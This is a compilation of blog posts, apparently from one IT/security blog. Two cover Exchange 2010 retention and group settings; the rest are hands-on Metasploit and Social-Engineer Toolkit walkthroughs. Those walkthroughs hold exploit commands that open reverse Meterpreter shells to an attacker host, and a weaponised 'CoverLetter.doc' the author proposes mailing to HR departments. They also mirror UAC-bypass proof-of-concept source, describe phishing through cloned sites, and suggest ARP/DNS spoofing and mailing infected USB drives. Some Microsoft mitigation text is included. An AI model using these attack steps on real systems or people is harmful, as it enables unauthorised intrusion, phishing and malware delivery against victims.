I was recently working on a project that involved creating some Retention policies for our Exchange 2010 sp1 environment. The project got a bit scary in the testing phase when we realized that the Inbox deletion policies were also deleting emails in the user’s sub-folder.  The came as a surprise to us since we were able to use the same type of policy in Exchange 2003 prior to upgrading.

To solve this issue we had to create retention policies to manage our deleted items, sent items, and drafts but use message record management to handle our inbox. Since MRM was being phased out of 2010 this solution needed to be implemented via the Exchange management shell (Powershell).

Implementing MRM:

Messaging records management (MRM) is the records management technology in Microsoft Exchange Server 2010 that helps organizations reduce the legal risks associated with e-mail. MRM makes it easier to keep the messages needed to comply with company policy, government regulations, or legal needs, and to remove content that has no legal or business value.

Prior to implementing this its best to check to see if any additional policies were created and if you don’t play on using them going forward delete them. You can do so with the below commands:

Review commands:

ManagedFolderMailboxPolicy

 [PS] C:\Windows\system32>Get-ManagedFolderMailboxPolicy

Name                      ManagedFolderLinks

—-                              ——————

Test Policy1            {Inbox}

ManagedContentSettings

 [PS] C:\Windows\system32>Get-ManagedContentSettings

 Name                      MessageClass              ManagedFolderName

—-                            ————- ————              —————–

Inbox Content               *                                           Inbox1

ManagedFolder

 [PS] C:\Windows\system32>Get-ManagedFolder

 Name                      FolderName                Description

—-                              ———-                ———–

Inbox1                    Inbox                     ManagedDefaultFolder

After retrieving this information you can now issue the following commands to remove any old or test policy:

Remove Policy from users

Set-Mailbox username -ManagedFolderMailboxPolicy $null

Removed ManagedFolder Mailbox Policy

[PS] C:\Windows\system32>Remove-ManagedFolderMailboxPolicy “Test Inbox Policy”

Remove Manage Content Setting

 [PS] C:\Windows\system32>Remove-ManagedContentSettings “Inbox Content”
Creating and Implementing MRM:

1. Create your managed folder
2. Create your managed folder content setting
3. Create your manage mailbox folder policy
4. Apply your policy to a user or to an exchange data store.
5. Start the managed folder assistant service or wait for it process on schedule

The below policy will delete all emails from the user mailbox that are 60 days old without touching any sub folders in the user’s Inbox.

Managed Folder Creation

 New-ManagedFolder -Name “Test Inbox” -DefaultFolderType Inbox -BaseFolderOnly $true -Comment “Items would be moved to deleted items for 60 days” -MustDisplayCommentEnabled  $true

Managed Folder Content Settings

New-ManagedContentSettings -Name “Test Content” -FolderName “Test Inbox” -MessageClass * -AgeLimitForRetention 60 -RetentionAction MoveToDeletedItems -RetentionEnabled $true -TriggerForRetention WhenDelivered

 Managed Mailbox Folder Policy

New-ManagedFolderMailboxPolicy -Name “TestPolicy” -ManagedFolderLinks “Test Inbox”

Verify settings

[PS] C:\Windows\system32>Get-ManagedFolderMailboxPolicy “TestPolicy” |fl

[PS] C:\Windows\system32>Get-ManagedContentSettings “Test Content”|fl

[PS] C:\Windows\system32>Get-ManagedFolder “Test Inbox” |fl

Start the Managed Folder Assistant to process the mailbox.

Apply to single user:

 Set-Mailbox -Identity testuser -ManagedFolderMailboxPolicy “TestPolicy”

Start-ManagedFolderAssistant -ID  testuser

Apply to a database level:

Get-Mailbox –database “Database Name” | Set-Mailbox –ManagedFolderMailboxPolicy “Name of the Policy”

Tip:

If you run into issues wait about 30 mins for the folders to replicate after created them. You can also stop and restart the “Managed Folder Assistant” service.

Would love to know how others handled this issue.

References:

http://technet.microsoft.com/en-us/library/bb508901%28EXCHG.80%29.aspx
http://technet.microsoft.com/en-us/library/dd335093.aspx

Hello all, so once more I have another post that’s Exchange 2010 related; why you ask because with so much to learn about Exchange you can never stop talking about it. So the issue I was faced with a few weeks ago was trying to figure out how to stop the students at the Uni I worked for from created their personal  groups and publishing it to the GAL (Global Address List) for everyone to see.

Just picture the president of the college trying to search for a contact and seeing something like “HackerContacts” as an option, that might trigger a few calls to the IT department.

I release that by default Exchange 2010 “Default Role Assignment Policy” allow all users to login via Outlook Web App, go to options –> see all options, then click on the groups options and on the right under “Public Groups I Own” a user can create a new group which would be published in the GAL.

After doing some research I release to block this you need to edit the “Default Role Assignment Policy” and uncheck the options under “Distribution groups, and Distribution group membership”.

• On your exchange server go to the toolbox->Role Based Access Control, This will launch IE and attempt to open the permissions area. If this does not open/work double check the account your logged in has a mailbox on 2010 first or is in the Enterprise admin group.
• You should see 2 menu items, “Users & Groups” and “Reporting” , You want “Users & Groups” then switch to the “User Roles” tab. In there edit the “Default Role Assignment Policy” which will pop up in a new window. All you have to do is remove the checkboxes as required  and it will get rid of the option for you.

Hope you found this useful, leave a comment if you have a better way or doing this or if these steps did not solve the issue for you. Thanks for reading!

Resource:

http://help.outlook.com/en-gb/140/ee424427.aspx

http://www.edugeek.net/forums/windows/53916-outlook-web-app-exchange-2010-public-groups.html

How many times have you fired off a Nessus scan and then after finding the goodies you have to go to either ExploitDB , or a similar site in search for a exploit. Or if you are a pro then its off to go and write your own exploit for the newly discovered vulnerability.

Today’s post will focus on what to do after you have scanned that vulnerable system and found a juice vulnerability. If this is the first time you have heard of ExploitDB or Metasploit you should first visit the Metasploit Unleashed training site.

Lab setup

• Backtrack 4 Linux VM
• Windows 2003 server with a  vulnerable web app

Below are the necessary steps to get from a Nessus scan to the correct Metasploit module for  exploiting your system.

Step one: Install Nessus

You can download your copy of nessus from HERE and don’t forget to register for a homefeed license. Now create your scan policy or used from one of the default policies. I selected the web application policy since the target server was running and outdated web application.  Once your scan is completed download the report and save it in a .nessus format.

Step two: Launching  Metasploit

Login to your machine of choice, in my case its my BackTrack4 Linux VM. Issue the following commands to load Metasploit:

• cd /pentest/exploits/framework3 (change directory to your metasploit installation dir)
• ./msfconsole
• svn up (to get the latest update)

Step three: DB Magic

At this stage you will need to create a DB, import the scanned nessus report, and then perform your hacking kungfu with the db_autopwn command.

msf > db_create

msf > db_connect
[-] Note that sqlite is not supported due to numerous issues.
[-] It may work, but don’t count on it
[*] Successfully connected to the database
[*] File: /root/.msf3/sqlite3.db

db_import /pentest/results/nessus_report_TestSrvr.nessus
msf > db_import /pentest/results/nessus_report_Appsrvr.nessus
[*] Importing ‘Nessus XML (v2)’ data
[*] Importing host 10.10.0.19
[*] Successfully imported /pentest/results/nessus_report_TestSrvr.nessus

db_autopwn -t -x

This command will search Metasploit for any exploits that matches your various vulnerability from the Nessus report, it will not automatically run the exploit for our unless you use the -e option. In most cases if you are testing this against a live system then you should leave out the -e option to avoid crashing your server.

msf > db_autopwn -t -x
[*] Analysis completed in 10 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*]                             Matching Exploit Modules
[*] ================================================================================
[*]   10.10.0.19:445  exploit/windows/smb/psexec  (CVE-1999-0504, OSVDB-3106)
[*]   10.10.0.19:80  exploit/windows/http/apache_mod_rewrite_ldap  (CVE-2006-3747, BID-19204, OSVDB-27588)
[*] ================================================================================
[*]
[*]

From this point I have two exploits to choose from:

msf > use exploit/windows/http/apache_mod_rewrite_ldap
msf exploit(apache_mod_rewrite_ldap) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(apache_mod_rewrite_ldap) > set LHOST 10.10.0.17
LHOST => 10.10.0.17
msf exploit(apache_mod_rewrite_ldap) > set RHOST 10.100.0.9
RHOST => 10.100.0.9
msf exploit(apache_mod_rewrite_ldap) > exploit

From this point on its GAME OVER!

References:
http://www.metasploit.com/modules/exploit/windows/smb/psexec
http://www.metasploit.com/modules/exploit/windows/http/apache_mod_rewrite_ldap
http://www.offensive-security.com/metasploit-unleashed/Introduction
http://www.tenable.com/products/nessus/documentation

With the new year usually brings hope for new changes however it seems to be the same old story with Microsoft. First advisory of the year and already you have to sit around waiting for MS to release a patch. Todays blog posting is based on the new Vulnerability in Graphics Rendering Engine . The guys over at www.metasploit.com has created a working exploit module for this that I was testing and it seem to be working as stated.

According to the note in the module, This module exploits a stack-based buffer overflow in the handling of thumbnails within .MIC files and various Office documents. When processing a thumbnail bitmap containing a negative ‘biClrUsed’ value, a stack-based buffer overflow occurs. This leads to arbitrary code execution.  In order to trigger the vulnerable code, the folder containing the document must be viewed using the “Thumbnails” view.

The vulnerability is exploited via malicious thumbnail images that may be attached to various documents (e.g. Microsoft Office documents). The most likely exploit vector would use e-mail attachments. However, it is also possible to use network shares.

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Affected Platforms:

All current versions of Windows, with the exception of Windows 7 and 2008 R2, are vulnerable.

Mitigation:

There is currently no patch available. However, it is possible to modify the access control list on shimgvw.dll to prevent rendering of thumbnails (this would affect all thumbnails, not just malicious once). See the Microsoft advisory for details.

Test Lab Setup:

• I used Vmware Workstation with two hosts (XP, and BT4)
• I tested this against a Windows XP SP3 host
• I used Metasploit v3.6.0-dev [core3.6 api:1.0]  with SVN revision 11471 on BackTrack 4 R2
• Exploit module used can be found under modules/exploits/windows/fileformat/ms11_xxx_createsizeddibsection.rb

Steps Taken:

• Launched msfconsole from within the /pentest/exploits/framework3 directory on my BT4 R2 host, once that was up I then issued the svn up command to ensure I had the latest and greatest.

• Selected my exploit  –>  msf > use exploit/windows/fileformat/ms11_xxx_createsizeddibsection

• Set filename and Output path –>

msf exploit(ms11_xxx_createsizeddibsection) > set FILENAME CoverLetter.doc

FILENAME => CoverLetter.doc

msf exploit(ms11_xxx_createsizeddibsection) > set OUTPUTPATH opt/metasploit3/msf3/data/exploits

OUTPUTPATH => /opt/metasploit3/msf3/data/exploits

Choosing your Payload: I decided to go with the meterpreter

msf exploit(ms11_xxx_createsizeddibsection) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

Setting up your local host (host you want victim to reverse connect too):

msf exploit(ms11_xxx_createsizeddibsection) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(ms11_xxx_createsizeddibsection) > set LPORT 4545

LPORT => 4545

Next issue the command  exploit to create your malicious file:

msf exploit(ms11_xxx_createsizeddibsection) > exploit

[*] Creating ‘CoverLetter.doc’ file …

[*] Generated output file /opt/metasploit3/msf3/data/exploits/CoverLetter.doc

Next we need to setup our reverse handler to listen on port 4545 for any incoming connections once our victim views/open our specially crafter file.  We can take this resume file and blast it out to HR departments across the net and just sit back and wait for them to  connect back home .

msf exploit(ms11_xxx_createsizeddibsection) > use exploit/multi/handler

msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(handler) > set LHOST 192.168.19.129

LHOST => 192.168.19.129

msf exploit(handler) > set LPORT 4545

LPORT => 4545

msf exploit(handler) > exploit

Now once our victim views the file in a thumbnail view, or opens it  you should see something like this:

[*] Started reverse handler on 192.168.19.129:4545

[*] Starting the payload handler…

[*] Sending stage (749056 bytes) to 192.168.19.147

[*] Meterpreter session 1 opened (192.168.19.129:4545 -> 192.168.19.147:1591) at Tue Jan 04 20:39:40 -0500 2011

From here you can jump into a shell on the system by issuing the “shell” command, or setup a Persistence Meterpreter backdoor as shown by Carlos, or start Capturing Windows Logons with Smartlocker basically sky’s the limit……Have fun hacking something.

Refernce links:

https://www.microsoft.com/technet/security/advisory/2490606.mspx

http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html

http://isc.sans.edu/diary.html?storyid=10201

Now the reason for this post is just to mirror what I think should be public knowledge and not be kept hidden since it was initially release yesterday. Today when I revisited the original site to download the POC and do some testing in my lab I  noticed it was removed. After looking around online a bit I found a few sites there were mirroring the information and I decided to do the same.

Bypassing UAC with User Privilege under Windows Vista/7

UINT codepage = GetACP();
TCHAR tmpstr[256];
_stprintf_s(tmpstr, TEXT("EUDC\\%d"), codepage);        // Get current code page
HKEY hKey;
RegCreateKeyEx(HKEY_CURRENT_USER, tmpstr, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_SET_VALUE | DELETE, NULL, &hKey, NULL);
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));

RegSetValueEx(hKey, TEXT("SystemDefaultEUDCFont"), 0, REG_BINARY, RegBuf, ExpSize);

__try
{
    EnableEUDC(TRUE);
}
__except(1)
{
}
RegDeleteValue(hKey, TEXT("SystemDefaultEUDCFont"));
RegCloseKey(hKey);

License

About the Author

noobpwnftw

I have to admit that I am a bit late to the party, but I see this as an opportunity to try out SET and learn a bit about the DLL hijacking issue at the same time.

Last Thursday, Acros, a Slovenian security firm, published an advisory that identified what they call a “binary planting” flaw in iTunes. Essentially, if you open a file type associated with iTunes from a remote network share, iTunes will also try to load one more DLLs from the share. Even if the file that the user opened is completely safe, a malicious DLL can be supplied that will lead to code execution.

HD Moore stated “While working on the Windows Shortcut exploit, he stumbled on this class of bugs and identified a couple dozen applications that seemed to be affected by this problem.  iTunes was one of these applications and the details in the Acros advisory made it clear that this was indeed the same flaw. He was planning to finish the advisories and start contacting vendors on August 20th (last Friday). The  Acros advisory on the 18th threw a wrench into this process.

Microsoft later release the following details  in an advisory:

Microsoft is aware that research has been published detailing a remote attack vector for a class of vulnerabilities that affects how applications load external libraries.

This issue is caused by specific insecure programming practices that allow so-called “binary planting” or “DLL preloading attacks”. These practices could allow an attacker to remotely execute arbitrary code in the context of the user running the vulnerable application when the user opens a file from an untrusted location.

This issue is caused by applications passing an insufficiently qualified path when loading an external library. Microsoft has issued guidance to developers in the MSDN article, Dynamic-Link Library Security, on how to correctly use the available application programming interfaces to prevent this class of vulnerability. Microsoft is also actively reaching out to third-party vendors through the Microsoft Vulnerability Research Program to inform them of the mitigations available in the operating system. Microsoft is also actively investigating which of its own applications may be affected.

In addition to this guidance, Microsoft is releasing a tool that allows system administrators to mitigate the risk of this new attack vector by altering the library loading behavior system-wide or for specific applications. This advisory describes the functionality of this tool and other actions that customers can take to help protect their systems.

Mitigating Factors:

• This issue only affects applications that do not load external libraries securely. Microsoft has previously published guidelines for developers in the MSDN article, Dynamic-Link Library Security, that recommend alternate methods to load libraries that are safe against these attacks.
• For an attack to be successful, a user must visit an untrusted remote file system location or WebDAV share and open a document from this location that is then loaded by a vulnerable application.

• The file sharing protocol SMB is often disabled on the perimeter firewall. This limits the possible attack vectors for this vulnerability.

Demo Time with SET… Thanks to Dave for his wonderful video that he posted this afternoon, I can now use this as my base for this demo.

What is SET?

The Social-Engineer Toolkit (SET) was designed by David Kennedy (ReL1K) and incorporates many useful Social-Engineering attacks all in one simplistic interface. The main purpose of SET is to automate and improve on many of the social-engineering attacks out there. As pentesters, social-engineering is often a practice that not many people perform. You can download the Social-Engineering Toolkit through subversion by simply typing this in Back|Track 4 or any other Linux OS.

svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

However BT4 now comes with SET located under /pentest/exploits/set, from here you can simply launch SET with a ./set and get your latest updates by selecting option 8.

SET can do tons of cool stuff and I have included a few links at the end of this post that explains them in details, and I have a few post to come that will also go into some more details. However for todays demo I will only be using a few of those features.

Launch and update SET

If you are using BackTrack4 you can find SET located under /pentest/exploits/set, you can launch it with ./set and as stated above select option 8 to get the latest and greatest updates.

Choose your path to pwnage

I selected Option 2 or “Web Attack  Vectors” which is a unique way of utilizing multiple web-based attacks in order to compromise the intended victim.

Select option 2 once more “The Metasploit Browser Exploit Method” this method will utilize select Metasploit browser exploits through an iframe and deliver a Metasploit payload.

And yet again select option 2, “Site Cloner” this method will completely clone a website of your choosing and allow you to utilize the attack vectors within the same web application you were attempting to clone.

Choosing your browser Exploit:

At this point you have several options to choose from, today we will be picking option 1 “Microsoft Windows WebDAV Application DLL Hijacker”.

Choosing your Payload:

Once more you are giving several options, I choose option 2 “Windows Reverse_TCP Meterpreter“, this payload  will spawn a meterpreter shell on the victim and send it back to the attacker.

Once you are done, you have to choose your vulnerable extension types if you are not certain select enter to choose the defaults, or find a semi-complete list over at exploitdb . At this point the malicious iframes are infected into the cloned website and awaits your victim.

SET Mass E-Mailer Option :

There are two options on the mass e-mailer,we are choosing option1 this option will allow you to send an email to one individual person. Once you are done you have to choose who you would like to send the phishing email too, and who is your sender lastly figure if you would like to use Gmail, your own mail server or some open relay server.

Next think of something clever as a email subject and body. A good example would be to clone a local web-based system from your attacker network and send an email saying “we are doing some updates kindly click to verify you can access this test link. After you are finish click Ctrl + C and hit enter to complete this step. You will then receive a message stating that SET has already sent the email. Now is just a matter of waiting on your victim to click the email and check out the vulnerable files via the network share.

Exploit in action..

Once your victim clicks on the link, the  will be presented with the cloned site at first then the exploit will begin doing its thing in the background. Shortly after the user will be presented with a network share with the vulnerable files. After opening up the file  it  its Game Over.

Since the initial reporting of this issue, many researchers have came out with several ways of doing this so far some of my favorites are:

• Using msfconsole courtesy of the guys HDM in this post.
• Using msfpayload courtesy of Matt over at http://www.attackvector.org/alternative-dll-hijacking-method/
• Yet again Matt demoing using msfpayload + autorun usb stick  http://www.attackvector.org/autorun-dll-hijacker-usb-stick/

I have tested several of these and noticed that MSE AV was effective in identifying the msfpayload file, however using the standard method I successful exploited both windows XP and Windows 7.

Reference links:

http://www.exploit-db.com/exploits/14726/

http://blog.metasploit.com/2010/08/exploiting-dll-hijacking-flaws.html

http://blog.rapid7.com/?p=5325

http://www.securityfocus.com/archive/1/513190

http://www.microsoft.com/technet/security/advisory/2269637.mspx

http://www.vimeo.com/14403642

http://www.secmaniac.com/

http://www.offensive-security.com/offsec/microsoft-dll-hijacking-exploit-in-action/

http://www.offensive-security.com/metasploit-unleashed/Social-Engineering-Toolkit

A few days ago I posted a blog entry called Microsoft Validates Shortcut Vulnerability, this entry basically explains what the issue is and also listed a few basic mitigation techniques.

Below I will be demonstrating how you can actively exploit this vulnerability using Metasploit.

Proof of concept testing:
This test was preformed using my BT4 VM which was assigned IP address 192.168.126.135 and a Win XPSP3 VM using IP address 192.168.126.134.

Step 1: Load Metasploit and get latest update

On my BackTrack4 VM, I browsed to /pentest/exploit/framework3, then load msfconsole once that is loaded run svn update so you can get the latest and greatest.

Fig-1 SVN Update

Step 2: Select your Exploit and Payload

msf > use exploit/windows/browser/ms10_xxx_Windows_shell_lnk_execute

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > show options

The show options commands will show you the various parameters  that needs to be set in order for the exploit to be functional. In our case its setting up the listening IP and listening port.

Fig-2  Choosing Exploit and Payload

Step 3: Fill-in required options and run exploit

At this stage you simply fill in the correct IP address and listening port for the machine that you are launching the attack from. If this is not correct the victim machine would not know where to connect back too, since I selected reverse_tcp.

msf exploit(ms10_xxx_Windows_shell_lnk_execute) > SET SRVHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >SET LHOST 192.168.126.135

msf exploit(ms10_xxx_Windows_shell_lnk_execute) >exploit

Fig-3 Fill-in LHOST and SRVHOST

Step 4: Get your victim to click the link or view the malicious file

Now at this stage  you have to get a bit creative, I can suggest a few things you can try:

• Use Ettercap to DNS spoof a target network and redirect them to your malicious URL, example.
• Use a tool like Social Engineering Toolkit “SET” to send a spoofed email with your malicious link, example.
• ARP spoof your host network and find a given target that’s using Facebook or one of  many social networks and try to send them the link that way.
• Try a far out social engineering  attack like purchase several USB drives inject them and mail them to your target with the label “free USB drive”.

Once you have your targets in sight just sit back and wait, once an exploitation has been kicked off you will see the below;

Fig-4 Successful Exploit

Verify you have an active session, session using sessions -l, next connect to that session with sessions -i #, from here you can run help to get a list of possible commands. I simply ran ipconfig and getuid to show that I was on the Windows XPVM and that it was successfully exploited.

Fig-5 Running Commands on exploited host

Fig-6 Popup box on exploited host

In the end there is really not much the average user can do that is not aware of your everyday vulnerability, but us as IT professional need to be in the loop so that we can take back the information and make them aware. Lastly the image in figure 6 should be a dead giveaway that something is up with your computer if you didn’t connect to a share but all of sudden you see one pop-up its time for a “wipe and reinstall.” Have fun until Microsoft patches this one and remember to be responsible. All feedback are welcome.

Last Thursday I read a posting over at   http://krebsonsecurity.com referencing  a potential vulnerability that relates to the way how Windows parses shortcuts. Since Microsoft didn’t confirm this at the time it was just another  interesting read. Now one day later Microsoft did validate this claim and now its yet another Windows zero-day without a proper workaround.

Issue:

The vulnerability exists because Windows incorrectly parses shortcuts in such a way that malicious code may be executed when the user clicks the displayed icon of a specially crafted shortcut. This vulnerability is most likely to be exploited through removable drives. For systems that have AutoPlay disabled, customers would need to manually browse to the root folder of the removable disk in order for the vulnerability to be exploited.

Workaround:

Microsoft has tested the following workarounds and states in the discussion whether a workaround reduces functionality:

•

Disable the displaying of icons for shortcuts Note Using Registry Editor incorrectly can cause serious problems that may require you to reinstall your operating system. Microsoft cannot guarantee that problems resulting from the incorrect use of Registry Editor can be solved. Use Registry Editor at your own risk. For information about how to edit the registry, view the “Changing Keys And Values” Help topic in Registry Editor (Regedit.exe) or view the “Add and Delete Information in the Registry” and “Edit Registry Data” Help topics in Regedt32.exe. 1. Click Start, click Run, type Regedit in the Open box, and then click OK 2. Locate and then click the following registry key: HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler 3. Click the File menu and select Export 4. In the Export Registry File dialog box, enter LNK_Icon_Backup.reg and click Save Note This will create a backup of this registry key in the My Documents folder by default 5. Select the value (Default) on the right hand window in the Registy Editor. Press Enter to edit the value of the key. Remove the value, so that the value is blank, and press Enter. 6. Restart explorer.exe or restart the computer. Impact of workaround.Disabling icons from being displayed for shortcuts prevents the issue from being exploited on affected systems. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

•

Disable the WebClient service Disabling the WebClient service helps protect affected systems from attempts to exploit this vulnerability by blocking the most likely remote attack vector through the Web Distributed Authoring and Versioning (WebDAV) client service. After applying this workaround, it will still be possible for remote attackers who successfully exploited this vulnerability to cause Microsoft Office Outlook to run programs located on the targeted user’s computer or the Local Area Network (LAN), but users will be prompted for confirmation before opening arbitrary programs from the Internet. To disable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Disabled. If the service is running, click Stop. 4. Click OK and exit the management application. Impact of workaround. When the WebClient service is disabled, Web Distributed Authoring and Versioning (WebDAV) requests are not transmitted. In addition, any services that explicitly depend on the Web Client service will not start, and an error message will be logged in the System log. For example, WebDAV shares will be inaccessible from the client computer. How to undo the workaround. To re-enable the WebClient Service, follow these steps: 1. Click Start, click Run, type Services.msc and then click OK. 2. Right-click WebClient service and select Properties. 3. Change the Startup type to Automatic. If the service is not running, click Start. 4. Click OK, and exit the management application.

This brings up the same concern I spoke about in this post , now that Microsoft is no longer supporting SP2 we can add this to the list of exploits that we can always be certain will work on the SP2 platform. In the end, if the workaround is not hindering any mission critical application  I think everyone should apply it.

References:

http://krebsonsecurity.com/2010/07/experts-warn-of-new-windows-shortcut-flaw/

http://www.computerworld.com/s/article/9179299/Microsoft_confirms_nasty_Windows_zero_day_bug?taxonomyId=17

http://www.microsoft.com/technet/security/advisory/2286198.mspx

http://clubhouse.microsoft.com/Public/Post/48631f1c-c884-4d3e-a19b-c9994bcd4637

Click OK and exit the management application.

In the words of Microsoft patch Tuesday is defined as ” When necessary, Microsoft releases security updates on the second Tuesday of each month. We publish security bulletins to announce and describe the update. Occasionally security updates are released more often.”

Now just in case you are wondering why I am choosing today to talk about patch Tuesdays of all days, well for starters today is significant because  patches,  and support for XP SP2 officially ends today. This might not seem like a big deal for a lot of people but I know the are several  companies that still run legacy software that are not supported by SP3 or above. So in short any new vulnerabilities that are discovered in the coming months or years will have all those users at there disposal just waiting to be exploited!

If you think that’s bad what about if a vulnerability was already  reported to Microsoft years ago and it was never patched, then those users could have already been exploited. A reference for this was a statement made by HD Moore on twitter today, “Almost four years later, Microsoft EOL’s Windows XP SP2 without fixing the flaw I reported in 2006. “ HDM is the Chief Architect of Metasploit project, the project was created to provide information on exploit techniques and to create a functional knowledge base for exploit developers and security professionals. So luckily he is one of the good guys, but what if this exploit and many more like this was in the wrong hands, sky’s the limit.

So for anyone that is still using XP SP2 time to apply the following patches below, and also come up with a strategy for these potentially vulnerable machines.

Latest Security Updates

• MS10-042 – (Patch NOW) addresses a vulnerability in Microsoft Windows (KB 2229593) –> previous blog entry on this
• MS10-043 – addresses a vulnerability in Microsoft Windows (KB 2032276)
• MS10-044 – addresses vulnerabilities in Microsoft Office (KB 982335)
• MS10-045 – addresses a vulnerability in Microsoft Office Outlook (KB 978212)

Looking forward to seeing what  others might have to say about this.

References:

http://www.microsoft.com/security/updates/bulletins/default.aspx

http://isc.sans.edu/diary.html?storyid=9166&rss

http://www.microsoft.com/security/updates/bulletins/201007.aspx

After seeing all the buzz on twitter about the newly discovered Microsoft zero day, I decided to try and replicate it in my lab and just act as another source for bringing about some awareness on the issue at hand.

According to  Microsoft Security Advisory (2219475),  Microsoft is investigating new public reports of a possible vulnerability in the Windows Help and Support Center function that is delivered with supported editions of Windows XP and Windows Server 2003. This vulnerability could allow remote code execution if a user views a specially crafted Web page using a Web browser or clicks a specially crafted link in an e-mail message. Microsoft is aware that proof of concept exploit code has been published for the vulnerability. However, Microsoft is not currently aware of active attacks that use this exploit code or of customer impact at this time. Microsoft is actively monitoring this situation to keep customers informed and to provide customer guidance as necessary.

In short  you are  affected if you are running any of the following OS:

• Windows XP Service Pack 2 and Windows XP Service Pack 3
• Windows XP Professional x64 Edition Service Pack 2
• Windows Server 2003 Service Pack 2
• Windows Server 2003 x64 Edition Service Pack 2
• Windows Server 2003 with SP2 for Itanium-based Systems

The advisory was prompted by the bug’s disclosure early Thursday , and the release of proof-of-concept attack code. Tavis Ormandy, a security engineer who works for Google in Switzerland, defended the decision to reveal the flaw only five days after reporting it to Microsoft. But Microsoft and other researchers questioned the quick publication.

Now I am somewhat on the fences with this one, I can see how responsible disclosure would have been ideal in this case for Microsoft. This would have given MS some more time to get a fully tested patch out. On the flip side I think knowing in advance can give us as defender a fighting chance since the disclosure to patch cycle can be a pretty lengthy process, and the “bad guys” could have already been using this for a long time now.

While trying to test this I was running into some issues then I was pointed to the following pastebin entry from the helpful guys over at http://www.skullsecurity.org/blog/ IRC.

POC testing with Metasploit Test #1:

I  started by testing the current exploit from the Metasploit framework on my BT4 VM, while attacking my Windows 7 workstation which had MSE installed. Since the release notes stated that Windows 7 is not affected I just wanted to see what type of effect it would have. I loaded up my Backtrack VM, lauched MSF and use the following commands.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > SET SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >SET LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >exploit

And as expected it failed!

Fig-1 Failed against Win7

Interestingly enough Microsoft Security Essentials was able to detect this while my Comodo Internet security suite did not.Fig-2 MSE detected Exploit attempt

I was then able to browse my temporary internet folder and detected the html page with the malicious Iframe.

Fig-3 Malicious Iframe

POC testing with Metasploit Test #2:

I then went on to try this on a newly build Windows XP SP3 and it kept failing, now after running the 74 or so Windows updates I attempted to try it again and I was sucessful. So it is always important to run updates .

I started this second test by loading up my BackTrack VM and repeating the same steps as above, then once this is setup I then went over to my Windows XP test machine and connected to http://backtrackmachine, so and just sit back and watch Metasploit with the Meterpreter payload do its thing.

msf > use exploit/windows/browser/ms10_xxx_helpctr_xss_cmd_exec

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set PAYLOAD windows/meterpreter/reverse_tcp

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > SET SRVHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >SET LHOST 192.168.126.131

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) >exploit

Fig-4 XP Successfully Exploited

Fig-5 Game over

As you can see form Fig-5  above the payload was deployed successfully and I was able to run a simple ipconfig command to verify that I was on the victim system with IP address 192.168.126.134.  I also went back over to the XP machine and ran netstat -an to verify that I was connected to the BackTrack VM via the listening port 4444.

Fig-6 WinXP Netstat -an

Now I noticed a few things on the victim test XP machine, once I connected to the malicous URL, (which with all the socail media outlets its just too easy to get an average user to click on a link ):

• I saw a command prompt pop-up and disappeared after 1-2 seconds
• I notice my Windows media player launched itself
• Lastly the “Help and Support Center” page was launched

Now for the average user some of these things might not always send up a red flag. However for anyone remotely security conscious if you ever notice a few of these random acts of weirdness its time to get out that clean backup image and start the nuke and pave process.

References

http://www.computerworld.com/s/article/9177966/Microsoft_confirms_critical_Windows_XP_bug

http://www.microsoft.com/technet/security/advisory/2219475.mspx

http://seclists.org/fulldisclosure/2010/Jun/205

http://www.offensive-security.com/metasploit-unleashed/metasploit-unleashed-free-information-security-training